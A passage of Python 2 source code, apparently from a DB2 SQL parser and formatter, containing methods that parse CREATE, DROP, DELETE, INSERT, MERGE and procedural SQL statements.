self._parse_create_view_statement()
elif self._match('INDEX'):
self._parse_create_index_statement(unique=False)
elif self._match_sequence(['UNIQUE', 'INDEX']):
self._parse_create_index_statement(unique=True)
else:
self._expected_one_of(['TABLE', 'VIEW', 'INDEX', 'UNIQUE'])
elif self._match_sequence(['COMMENT', 'ON']):
self._parse_comment_statement()
elif self._match('GRANT'):
self._parse_grant_statement()
else:
break
def _parse_create_security_label_component_statement(self):
"""Parses a CREATE SECURITY LABEL COMPONENT statement"""
# CREATE SECURITY LABEL COMPONENT already matched
self._expect(TT.IDENTIFIER)
if self._match('ARRAY'):
self._expect('[', prespace=False)
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(']')
elif self._match('SET'):
self._expect('{', prespace=False)
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect('}')
elif self._match('TREE'):
self._expect_sequence(['(', TT.STRING, 'ROOT'], prespace=False)
while self._match(','):
self._expect_sequence([TT.STRING, 'UNDER', TT.STRING])
self._expect(')')
def _parse_create_security_label_statement(self):
"""Parses a CREATE SECURITY LABEL statement"""
# CREATE SECURITY LABEL already matched
self._parse_security_label_name()
while True:
self._expect_sequence(['COMPONENT', TT.IDENTIFIER, TT.STRING])
while self._match_sequence([',', TT.STRING]):
pass
if not self._match(','):
break
def _parse_create_security_policy_statement(self):
"""Parses a CREATE SECURITY POLICY statement"""
# CREATE SECURITY POLICY already matched
self._expect_sequence([TT.IDENTIFIER, 'COMPONENTS'])
while True:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._expect_sequence(['WITH', 'DB2LBACRULES'])
if self._match_one_of(['OVERRIDE', 'RESTRICT']):
self._expect_sequence(['NOT', 'AUTHORIZED', 'WRITE', 'SECURITY', 'LABEL'])
def _parse_create_sequence_statement(self):
"""Parses a CREATE SEQUENCE statement"""
# CREATE SEQUENCE already matched
self._parse_sequence_name()
if self._match('AS'):
self._parse_datatype()
self._parse_identity_options()
def _parse_create_service_class_statement(self):
"""Parses a CREATE SERVICE CLASS statement"""
# CREATE SERVICE CLASS already matched
self._expect(TT.IDENTIFIER)
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
if self._match_sequence(['AGENT', 'PRIORITY']):
self._expect_one_of(['DEFAULT', TT.NUMBER])
if self._match_sequence(['PREFETCH', 'PRIORITY']):
self._expect_one_of(['DEFAULT', 'HIGH', 'MEDIUM', 'LOW'])
if self._match_sequence(['OUTBOUND', 'CORRELATOR']):
self._expect_one_of(['NONE', TT.STRING])
if self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
if self._match_sequence(['COLLECT', 'AGGREGATE', 'ACTIVITY', 'DATA']):
self._expect_one_of(['NONE', 'BASE', 'EXTENDED'])
if self._match_sequence(['COLLECT', 'AGGREGATE', 'REQUEST', 'DATA']):
self._expect_one_of(['NONE', 'BASE'])
self._parse_histogram_template_clause()
self._match_one_of(['ENABLE', 'DISABLE'])
def _parse_create_server_statement(self):
"""Parses a CREATE SERVER statement"""
# CREATE SERVER already matched
self._expect(TT.IDENTIFIER)
if self._match('TYPE'):
self._expect(TT.IDENTIFIER)
if self._match('VERSION'):
self._parse_server_version()
if self._match('WRAPPER'):
self._expect(TT.IDENTIFIER)
if self._match('AUTHORIZATION'):
self._expect_sequence([TT.IDENTIFIER, 'PASSWORD', TT.IDENTIFIER])
if self._match('OPTIONS'):
self._parse_federated_options()
def _parse_create_table_statement(self):
"""Parses a CREATE TABLE statement"""
# CREATE TABLE already matched
self._parse_table_name()
if self._match('LIKE'):
self._parse_relation_name()
self._parse_copy_options()
else:
# Ambiguity: Open parentheses could indicate an optional field list
# preceding a materialized query or staging table definition
reraise = False
self._save_state()
try:
# Try parsing CREATE TABLE ... AS first
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
if self._match('AS'):
reraise = True
self._expect('(')
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options()
elif self._match('FOR'):
reraise = True
self._parse_relation_name()
self._expected_sequence(['PROPAGATE', 'IMMEDIATE'])
else:
self._expected_one_of(['AS', 'FOR'])
except ParseError:
# If that fails, rewind and parse other CREATE TABLE forms
self._restore_state()
if reraise: raise
self._parse_table_definition(aligntypes=True, alignoptions=True, federated=False)
else:
self._forget_state()
# Parse table option suffixes. Not all of these are valid with
# particular table definitions, but it's too difficult to sort out
# which are valid for what we've parsed so far
valid = set([
'ORGANIZE',
'DATA',
'IN',
'INDEX',
'LONG',
'DISTRIBUTE',
'PARTITION',
'COMPRESS',
'VALUE',
'WITH',
'NOT',
'CCSID',
'SECURITY',
'OPTIONS',
])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'ORGANIZE':
self._expect('BY')
if self._match_sequence(['KEY', 'SEQUENCE']):
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if self._match('STARTING'):
self._match('FROM')
self._expect(TT.NUMBER)
self._expect('ENDING')
self._match('AT')
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
self._expect_one_of(['ALLOW', 'DISALLOW'])
self._expect('OVERFLOW')
if self._match('PCTFREE'):
self._expect(INTEGER)
else:
self._match('DIMENSIONS')
self._expect('(')
while True:
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
elif t == 'DATA':
self._expect('CAPTURE')
self._expect_one_of(['CHANGES', 'NONE'])
elif t == 'IN':
self._parse_ident_list()
if self._match('NO'):
self._expect('CYCLE')
else:
self._match('CYCLE')
elif t == 'LONG':
self._expect('IN')
self._parse_ident_list()
elif t == 'INDEX':
self._expect_sequence(['IN', TT.IDENTIFIER])
elif t == 'DISTRIBUTE':
self._expect('BY')
if self._match('REPLICATION'):
pass
else:
self._match('HASH')
self._expect('(', prespace=False)
self._parse_ident_list()
self._expect(')')
elif t == 'PARTITION':
self._expect('BY')
self._match('RANGE')
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if self._match('NULLS'):
self._expect_one_of(['FIRST', 'LAST'])
if not self._match(','):
break
self._expect_sequence([')', '('])
while True:
if self._match('PARTITION'):
self._expect(TT.IDENTIFIER)
self._parse_partition_boundary()
if self._match('IN'):
self._expect(TT.IDENTIFIER)
elif self._match('EVERY'):
if self._match('('):
self._expect(TT.NUMBER)
self._parse_duration_label()
self._expect(')')
else:
self._expect(TT.NUMBER)
self._parse_duration_label()
if not self._match(','):
break
elif t == 'COMPRESS':
self._expect_one_of(['NO', 'YES'])
elif t == 'VALUE':
self._expect('COMPRESSION')
elif t == 'WITH':
self._expect_sequence(['RESTRICT', 'ON', 'DROP'])
elif t == 'NOT':
self._expect_sequence(['LOGGED', 'INITIALLY'])
elif t == 'CCSID':
self._expect_one_of(['ASCII', 'UNICODE'])
elif t == 'SECURITY':
self._expect_sequence(['POLICY', TT.IDENTIFIER])
elif t == 'OPTIONS':
self._parse_federated_options(alter=False)
def _parse_create_tablespace_statement(self, tbspacetype='REGULAR'):
"""Parses a CREATE TABLESPACE statement"""
# CREATE TABLESPACE already matched
self._expect(TT.IDENTIFIER)
if self._match('IN'):
if self._match('DATABASE'):
self._expect_sequence(['PARTITION', 'GROUP'])
elif self._match('NODEGROUP'):
pass
self._expect(TT.IDENTIFIER)
if self._match('PAGESIZE'):
self._expect(TT.NUMBER)
self._match('K')
if self._match('MANAGED'):
self._expect('BY')
if self._match('AUTOMATIC'):
self._expect('STORAGE')
self._parse_tablespace_size_attributes()
elif self._match('DATABASE'):
self._expect('USING')
while True:
self._parse_database_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
if not self._match('USING'):
break
self._parse_tablespace_size_attributes()
elif self._match('SYSTEM'):
self._expect('USING')
while True:
self._parse_system_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
if not self._match('USING'):
break
else:
self._expected_one_of(['AUTOMATIC', 'DATABASE', 'SYSTEM'])
if self._match('EXTENTSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M'])
if self._match('PREFETCHSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
if self._match('BUFFERPOOL'):
self._expect(TT.IDENTIFIER)
if self._match('OVERHEAD'):
self._expect(TT.NUMBER)
if self._match('NO'):
self._expect_sequence(['FILE', 'SYSTEM', 'CACHING'])
elif self._match('FILE'):
self._expect_sequence(['SYSTEM', 'CACHING'])
if self._match('TRANSFERRATE'):
self._expect(TT.NUMBER)
if self._match('DROPPED'):
self._expect_sequence(['TABLE', 'RECOVERY'])
self._expect_one_of(['ON', 'OFF'])
def _parse_create_threshold_statement(self):
"""Parses a CREATE THRESHOLD statement"""
# CREATE THRESHOLD already matched
self._expect_sequence([TT.IDENTIFIER, 'FOR'])
if self._match('SERVICE'):
self._expect_sequence(['CLASS', TT.IDENTIFIER])
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
elif self._match('WORKLOAD'):
self._expect(TT.IDENTIFIER)
elif not self._match('DATABASE'):
self._expected_one_of(['SERVICE', 'WORKLOAD', 'DATABASE'])
self._expect_sequence(['ACTIVITIES', 'ENFORCEMENT'])
if self._match('DATABASE'):
self._match('PARTITION')
elif self._match('WORKLOAD'):
self._expect('OCCURRENCE')
else:
self._expected_one_of(['DATABASE', 'WORKLOAD'])
self._match_one_of(['ENABLE', 'DISABLE'])
self._expect('WHEN')
self._parse_threshold_predicate()
self._parse_threshold_exceeded_actions()
def _parse_create_trigger_statement(self):
"""Parses a CREATE TRIGGER statement"""
# CREATE TRIGGER already matched
self._parse_trigger_name()
self._indent()
if self._match_sequence(['NO', 'CASCADE']):
self._expect('BEFORE')
elif self._match('BEFORE'):
pass
elif self._match_sequence(['INSTEAD', 'OF']):
pass
elif self._match('AFTER'):
pass
else:
self._expected_one_of(['AFTER', 'BEFORE', 'NO', 'INSTEAD'])
if self._match('UPDATE'):
if self._match('OF'):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
else:
self._expect_one_of(['INSERT', 'DELETE', 'UPDATE'])
self._expect('ON')
self._parse_table_name()
if self._match('REFERENCING'):
self._newline(-1)
valid = ['OLD', 'NEW', 'OLD_TABLE', 'NEW_TABLE']
while valid:
if len(valid) == 4:
t = self._expect_one_of(valid)
else:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t in ('OLD', 'NEW'):
if 'OLD_TABLE' in valid: valid.remove('OLD_TABLE')
if 'NEW_TABLE' in valid: valid.remove('NEW_TABLE')
elif t in ('OLD_TABLE', 'NEW_TABLE'):
if 'OLD' in valid: valid.remove('OLD')
if 'NEW' in valid: valid.remove('NEW')
self._match('AS')
self._expect(TT.IDENTIFIER)
self._newline()
self._expect_sequence(['FOR', 'EACH'])
self._expect_one_of(['ROW', 'STATEMENT'])
if self._match('MODE'):
self._newline(-1)
self._expect('DB2SQL')
if self._match('WHEN'):
self._expect('(')
self._indent()
self._parse_search_condition()
self._outdent()
self._expect(')')
try:
label = self._expect(TT.LABEL).value
self._outdent(-1)
self._newline()
except ParseError:
label = None
if self._match('BEGIN'):
if not label: self._outdent(-1)
self._parse_compiled_compound_statement(label=label)
else:
self._newline()
self._parse_compiled_statement()
if not label: self._outdent()
# XXX This shouldn't be here, but DB2 for z/OS appears to have a
# parser bug which allows this
self._match_sequence([(TT.TERMINATOR, ';'), (TT.KEYWORD, 'END')])
def _parse_create_trusted_context_statement(self):
"""Parses a CREATE TRUSTED CONTEXT statement"""
# CREATE TRUSTED CONTEXT already matched
self._expect_sequence([TT.IDENTIFIER, 'BASED', 'UPON', 'CONNECTION', 'USING'])
valid = set([
'SYSTEM',
'ATTRIBUTES',
'NO',
'DEFAULT',
'DISABLE',
'ENABLE',
'WITH',
])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'SYSTEM':
self._expect_sequence(['AUTHID', TT.IDENTIFIER])
elif t == 'ATTRIBUTES':
self._expect('(')
if self._match('ADDRESS'):
self._expect(TT.STRING)
if self._match('WITH'):
self._expect_sequence(['ENCRYPTION', TT.STRING])
elif self._match('ENCRYPTION'):
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(')')
elif t == 'NO':
valid.remove('DEFAULT')
self._expect_sequence(['DEFAULT', 'ROLE'])
elif t == 'DEFAULT':
valid.remove('NO')
self._expect_sequence(['ROLE', TT.IDENTIFIER])
elif t == 'DISABLE':
valid.remove('ENABLE')
elif t == 'ENABLE':
valid.remove('DISABLE')
elif t == 'WITH':
self._expect_sequence(['USE', 'FOR'])
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
if self._match('ROLE'):
self._expect(TT.IDENTIFIER)
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('AUTHENTICATION')
def _parse_create_type_statement(self):
"""Parses a CREATE DISTINCT TYPE statement"""
# CREATE DISTINCT TYPE already matched
self._parse_type_name()
self._expect('AS')
self._parse_datatype()
if self._match('ARRAY'):
self._expect('[', prespace=False)
self._match(TT.NUMBER)
self._expect(']')
else:
self._match_sequence(['WITH', 'COMPARISONS'])
def _parse_create_type_mapping_statement(self):
"""Parses a CREATE TYPE MAPPING statement"""
# CREATE TYPE MAPPING already matched
self._match(TT.IDENTIFIER)
valid = set(['FROM', 'TO'])
t = self._expect_one_of(valid).value
valid.remove(t)
self._match_sequence(['LOCAL', 'TYPE'])
self._parse_datatype()
self._expect_one_of(valid)
self._parse_remote_server()
self._match('REMOTE')
self._expect('TYPE')
self._parse_type_name()
if self._match('FOR'):
self._expect_sequence(['BIT', 'DATA'])
elif self._match('(', prespace=False):
if self._match('['):
self._expect_sequence([TT.NUMBER, '..', TT.NUMBER], interspace=False)
self._expect(']')
else:
self._expect(TT.NUMBER)
if self._match(','):
if self._match('['):
self._expect_sequence([TT.NUMBER, '..', TT.NUMBER], interspace=False)
self._expect(']')
else:
self._expect(TT.NUMBER)
self._expect(')')
if self._match('P'):
self._expect_one_of(['=', '>', '<', '>=', '<=', '<>'])
self._expect('S')
def _parse_create_user_mapping_statement(self):
"""Parses a CREATE USER MAPPING statement"""
# CREATE USER MAPPING already matched
self._expect('FOR')
self._expect_one_of(['USER', TT.IDENTIFIER])
self._expect_sequence(['SERVER', TT.IDENTIFIER])
self._expect('OPTIONS')
self._parse_federated_options(alter=False)
def _parse_create_variable_statement(self):
"""Parses a CREATE VARIABLE statement"""
# CREATE VARIABLE already matched
self._parse_variable_name()
self._parse_datatype()
if self._match_one_of(['DEFAULT', 'CONSTANT']):
self._parse_expression()
def _parse_create_view_statement(self):
"""Parses a CREATE VIEW statement"""
# CREATE VIEW already matched
self._parse_view_name()
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
self._expect('AS')
self._newline()
self._parse_query()
valid = set(['CASCADED', 'LOCAL', 'CHECK', 'ROW', 'NO'])
while valid:
if not self._match('WITH'):
break
t = self._expect_one_of(valid).value
valid.remove(t)
if t in ('CASCADED', 'LOCAL', 'CHECK'):
valid.discard('CASCADED')
valid.discard('LOCAL')
valid.discard('CHECK')
if t != 'CHECK':
self._expect('CHECK')
self._expect('OPTION')
elif t == 'NO':
valid.remove('ROW')
self._expect_sequence(['ROW', 'MOVEMENT'])
elif t == 'ROW':
valid.remove('NO')
self._expect('MOVEMENT')
def _parse_create_work_action_set_statement(self):
"""Parses a CREATE WORK ACTION SET statement"""
# CREATE WORK ACTION SET already matched
self._expect(TT.IDENTIFIER)
self._expect('FOR')
if self._match('SERVICE'):
self._expect_sequence(['CLASS', TT.IDENTIFIER])
elif self._match('DATABASE'):
pass
else:
self._expected_one_of(['SERVICE', 'DATABASE'])
self._expect_sequence(['USING', 'WORK', 'CLASS', 'SET', TT.IDENTIFIER])
if self._match('('):
self._indent()
while True:
self._expect_sequence(['WORK', 'ACTION', TT.IDENTIFIER, 'ON', 'WORK', 'CLASS', TT.IDENTIFIER])
self._parse_action_types_clause()
self._parse_histogram_template_clause()
self._match_one_of(['ENABLE', 'DISABLE'])
if self._match(','):
self._newline()
else:
break
self._outdent()
self._expect(')')
self._match_one_of(['ENABLE', 'DISABLE'])
def _parse_create_work_class_set_statement(self):
"""Parses a CREATE WORK CLASS SET statement"""
# CREATE WORK CLASS SET already matched
self._expect(TT.IDENTIFIER)
if self._match('('):
self._indent()
while True:
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
self._parse_work_attributes()
if self._match('POSITION'):
self._parse_position_clause()
if self._match(','):
self._newline()
else:
break
self._outdent()
self._expect(')')
def _parse_create_workload_statement(self):
"""Parses a CREATE WORKLOAD statement"""
# CREATE WORKLOAD statement
self._expect(TT.IDENTIFIER)
first = True
while True:
# Repeatedly try and match connection attributes. Only raise a
# parse error if the first match fails
try:
self._parse_connection_attributes()
except ParseError, e:
if first:
raise e
else:
first = False
self._match_one_of(['ENABLE', 'DISABLE'])
if self._match_one_of(['ALLOW', 'DISALLOW']):
self._expect_sequence(['DB', 'ACCESS'])
if self._match_sequence(['SERVICE', 'CLASS']):
if not self._match('SYSDEFAULTUSERCLASS'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['UNDER', TT.IDENTIFIER])
if self._match('POSITION'):
self._parse_position_clause()
if self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
def _parse_create_wrapper_statement(self):
"""Parses a CREATE WRAPPER statement"""
# CREATE WRAPPER already matched
self._expect(TT.IDENTIFIER)
if self._match('LIBRARY'):
self._expect(TT.STRING)
if self._match('OPTIONS'):
self._parse_federated_options(alter=False)
def _parse_declare_cursor_statement(self):
"""Parses a top-level DECLARE CURSOR statement"""
# DECLARE already matched
self._expect_sequence([TT.IDENTIFIER, 'CURSOR'])
self._match_sequence(['WITH', 'HOLD'])
self._expect('FOR')
self._newline()
self._parse_select_statement()
def _parse_declare_global_temporary_table_statement(self):
"""Parses a DECLARE GLOBAL TEMPORARY TABLE statement"""
# DECLARE GLOBAL TEMPORARY TABLE already matched
self._parse_table_name()
if self._match('LIKE'):
self._parse_table_name()
self._parse_copy_options()
elif self._match('AS'):
self._parse_full_select()
self._expect_sequence(['DEFINITION', 'ONLY'])
self._parse_copy_options()
else:
self._parse_table_definition(aligntypes=True, alignoptions=False, federated=False)
valid = set(['ON', 'NOT', 'WITH', 'IN', 'PARTITIONING'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'ON':
self._expect('COMMIT')
self._expect_one_of(['DELETE', 'PRESERVE'])
self._expect('ROWS')
elif t == 'NOT':
self._expect('LOGGED')
if self._match('ON'):
self._expect('ROLLBACK')
self._expect_one_of(['DELETE', 'PRESERVE'])
self._expect('ROWS')
elif t == 'WITH':
self._expect('REPLACE')
elif t == 'IN':
self._expect(TT.IDENTIFIER)
elif t == 'PARTITIONING':
self._expect('KEY')
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._match_sequence(['USING', 'HASHING'])
def _parse_delete_statement(self):
"""Parses a DELETE statement"""
# DELETE already matched
self._expect('FROM')
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
# Ambiguity: INCLUDE is an identifier and hence can look like a table
# correlation name
reraise = False
self._save_state()
try:
# Try and parse a mandatory table correlation followed by a
# mandatory INCLUDE
self._parse_table_correlation(optional=False)
self._newline()
self._expect('INCLUDE')
reraise = True
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
# XXX Is SET required for an assignment clause? The syntax diagram
# doesn't think so...
if self._match('SET'):
self._parse_assignment_clause(allowdefault=False)
except ParseError:
# If that fails, rewind and parse an optional INCLUDE or an
# optional table correlation
self._restore_state()
if reraise: raise
if self._match('INCLUDE'):
self._newline(-1)
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
if self._match('SET'):
self._newline(-1)
self._parse_assignment_clause(allowdefault=False)
else:
self._parse_table_correlation()
else:
self._forget_state()
if self._match('WHERE'):
self._newline(-1)
self._indent()
self._parse_search_condition()
self._outdent()
if self._match('WITH'):
self._newline(-1)
self._expect_one_of(['RR', 'RS', 'CS', 'UR'])
def _parse_drop_statement(self):
"""Parses a DROP statement"""
# DROP already matched
if self._match_one_of(['ALIAS', 'SYNONYM', 'TABLE', 'VIEW', 'NICKNAME', 'VARIABLE']):
self._parse_subschema_name()
elif self._match_sequence(['FUNCTION', 'MAPPING']):
self._parse_function_name()
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
elif self._match('INDEX'):
self._parse_index_name()
elif self._match('SEQUENCE'):
self._parse_sequence_name()
elif self._match_sequence(['SERVICE', 'CLASS']):
self._expect(TT.IDENTIFIER)
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['TABLESPACE', 'TABLESPACES']):
self._parse_ident_list()
elif self._match_one_of(['DATA', 'DISTINCT']):
self._expect('TYPE')
self._parse_type_name()
elif self._match_sequence(['TYPE', 'MAPPING']):
self._parse_type_name()
elif self._match('TYPE'):
self._parse_type_name()
elif self._match_sequence(['USER', 'MAPPING']):
self._expect('FOR')
self._expect_one_of(['USER', TT.IDENTIFIER])
self._expect_sequence(['SERVER', TT.IDENTIFIER])
elif (self._match_sequence(['AUDIT', 'POLICY']) or
self._match('BUFFERPOOL') or
self._match_sequence(['EVENT', 'MONITOR']) or
self._match_sequence(['HISTORGRAM', 'TEMPLATE']) or
self._match('NODEGROUP') or
self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']) or
self._match('ROLE') or
self._match('SCHEMA') or
self._match_sequence(['SECURITY', 'LABEL', 'COMPONENT']) or
self._match_sequence(['SECURITY', 'LABEL']) or
self._match_sequence(['SECURITY', 'POLICY']) or
self._match('SERVER') or
self._match('THRESHOLD') or
self._match('TRIGGER') or
self._match_sequence(['TRUSTED', 'CONTEXT']) or
self._match_sequence(['WORK', 'ACTION', 'SET']) or
self._match_sequence(['WORK', 'CLASS', 'SET']) or
self._match('WORKLOAD') or
self._match('WRAPPER')):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of([
'ALIAS',
'AUDIT',
'BUFFERPOOL',
'DATA',
'DATABASE',
'DISTINCT',
'EVENT',
'FUNCTION',
'HISTOGRAM',
'INDEX',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'ROLE',
'SCHEMA',
'SECURITY',
'SEQUENCE',
'SERVICE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRIGGER',
'TRUSTED',
'TYPE',
'USER',
'VARIABLE',
'VIEW',
'WORK',
'WORKLOAD',
'WRAPPER',
])
# XXX Strictly speaking, this isn't DB2 syntax - it's generic SQL. But
# if we stick to strict DB2 semantics, this routine becomes boringly
# long...
self._match_one_of(['RESTRICT', 'CASCADE'])
def _parse_execute_immediate_statement(self):
"""Parses an EXECUTE IMMEDIATE statement in a procedure"""
# EXECUTE IMMEDIATE already matched
self._parse_expression()
def _parse_execute_statement(self):
"""Parses an EXECUTE statement in a procedure"""
# EXECUTE already matched
self._expect(TT.IDENTIFIER)
if self._match('INTO'):
while True:
self._parse_subrelation_name()
if self._match('['):
self._parse_expression()
self._expect(']')
if self._match('.'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
if self._match('USING'):
self._parse_expression_list()
def _parse_explain_statement(self):
"""Parses an EXPLAIN statement"""
# EXPLAIN already matched
if self._match('PLAN'):
self._match('SELECTION')
else:
self._expect_one_of(['PLAN', 'ALL'])
if self._match_one_of(['FOR', 'WITH']):
self._expect('SNAPSHOT')
self._match_sequence(['WITH', 'REOPT', 'ONCE'])
self._match_sequence(['SET', 'QUERYNO', '=', TT.NUMBER])
self._match_sequence(['SET', 'QUEYRTAG', '=', TT.STRING])
self._expect('FOR')
if self._match('DELETE'):
self._parse_delete_statement()
elif self._match('INSERT'):
self._parse_insert_statement()
elif self._match('MERGE'):
self._parse_merge_statement()
elif self._match_sequence(['REFRESH', 'TABLE']):
self._parse_refresh_table_statement()
elif self._match_sequence(['SET', 'INTEGRITY']):
self._parse_set_integrity_statement()
elif self._match('UPDATE'):
self._parse_update_statement()
else:
self._parse_select_statement()
def _parse_fetch_statement(self):
"""Parses a FETCH FROM statement in a procedure"""
# FETCH already matched
self._match('FROM')
self._expect(TT.IDENTIFIER)
if self._match('INTO'):
self._parse_ident_list()
elif self._match('USING'):
self._expect('DESCRIPTOR')
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of(['INTO', 'USING'])
def _parse_flush_optimization_profile_cache_statement(self):
"""Parses a FLUSH OPTIMIZATION PROFILE CACHE statement"""
# FLUSH OPTIMIZATION PROFILE CACHE already matched
if not self._match('ALL'):
self._parse_subschema_name()
def _parse_for_statement(self, label=None):
"""Parses a FOR-loop in a dynamic compound statement"""
# FOR already matched
self._expect_sequence([TT.IDENTIFIER, 'AS'])
reraise = False
self._indent()
# Ambiguity: IDENTIFIER vs. select-statement
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._match_one_of(['ASENSITIVE', 'INSENSITIVE'])
self._expect('CURSOR')
reraise = True
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('HOLD')
self._expect('FOR')
except ParseError:
self._restore_state()
if reraise: raise
else:
self._forget_state()
self._parse_select_statement()
self._outdent()
self._expect('DO')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
if self._match('END'):
break
self._outdent(-1)
self._expect('FOR')
if label:
self._match((TT.IDENTIFIER, label))
def _parse_free_locator_statement(self):
"""Parses a FREE LOCATOR statement"""
# FREE LOCATOR already matched
self._parse_ident_list()
def _parse_get_diagnostics_statement(self):
"""Parses a GET DIAGNOSTICS statement in a dynamic compound statement"""
# GET DIAGNOSTICS already matched
if self._match('EXCEPTION'):
self._expect((TT.NUMBER, 1))
while True:
self._expect_sequence([TT.IDENTIFIER, '='])
self._expect_one_of(['MESSAGE_TEXT', 'DB2_TOKEN_STRING'])
if not self._match(','):
break
else:
self._expect_sequence([TT.IDENTIFIER, '='])
self._expect(['ROW_COUNT', 'DB2_RETURN_STATUS'])
def _parse_goto_statement(self):
"""Parses a GOTO statement in a procedure"""
# GOTO already matched
self._expect(TT.IDENTIFIER)
def _parse_grant_statement(self):
"""Parses a GRANT statement"""
# GRANT already matched
self._parse_grant_revoke(grant=True)
def _parse_if_statement(self):
"""Parses an IF-conditional in a dynamic compound statement"""
# IF already matched
t = 'IF'
while True:
if t in ('IF', 'ELSEIF'):
self._parse_search_condition(newlines=False)
self._expect('THEN')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
t = self._match_one_of(['ELSEIF', 'ELSE', 'END'])
if t:
self._outdent(-1)
t = t.value
break
else:
self._newline()
elif t == 'ELSE':
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
break
else:
break
self._expect('IF')
def _parse_insert_statement(self):
"""Parses an INSERT statement"""
# INSERT already matched
self._expect('INTO')
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
if self._match('INCLUDE'):
self._newline(-1)
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
# Parse a full-select with optional common-table-expression, allowing
# the DEFAULT keyword in (for example) a VALUES clause
self._newline()
self._parse_query(allowdefault=True)
if self._match('WITH'):
self._newline(-1)
self._expect_one_of(['RR', 'RS', 'CS', 'UR'])
def _parse_iterate_statement(self):
"""Parses an ITERATE statement within a loop"""
# ITERATE already matched
self._match(TT.IDENTIFIER)
def _parse_leave_statement(self):
"""Parses a LEAVE statement within a loop"""
# LEAVE already matched
self._match(TT.IDENTIFIER)
def _parse_lock_table_statement(self):
"""Parses a LOCK TABLE statement"""
# LOCK TABLE already matched
self._parse_table_name()
self._expect('IN')
self._expect_one_of(['SHARE', 'EXCLUSIVE'])
self._expect('MODE')
def _parse_loop_statement(self, label=None):
"""Parses a LOOP-loop in a procedure"""
# LOOP already matched
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
self._expect('LOOP')
if label:
self._match((TT.IDENTIFIER, label))
def _parse_merge_statement(self):
# MERGE already matched
self._expect('INTO')
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
self._parse_table_correlation()
self._expect('USING')
self._parse_table_ref()
self._expect('ON')
self._parse_search_condition()
self._expect('WHEN')
while True:
self._match('NOT')
self._expect('MATCHED')
if self._match('AND'):
self._parse_search_condition()
self._expect('THEN')
self._indent()
if self._match('UPDATE'):
self._expect('SET')
self._parse_assignment_clause(allowdefault=True)
elif self._match('INSERT'):
if self._match('('):
self._parse_ident_list()
self._expect(')')
self._expect('VALUES')
if self._match('('):
self._parse_expression_list(allowdefault=True)
self._expect(')')
else:
if not self._match('DEFAULT'):
self._parse_expression()
if not self._match(','):
break
elif self._match('DELETE'):
pass
elif self._match('SIGNAL'):
self._parse_signal_statement
self._outdent()
if not self._match('WHEN'):
break
self._match_sequence(['ELSE', 'IGNORE'])
def _parse_open_statement(self):
"""Parses an OPEN cursor statement"""
# OPEN already matched
self._expect(TT.IDENTIFIER)
if self._match('('):
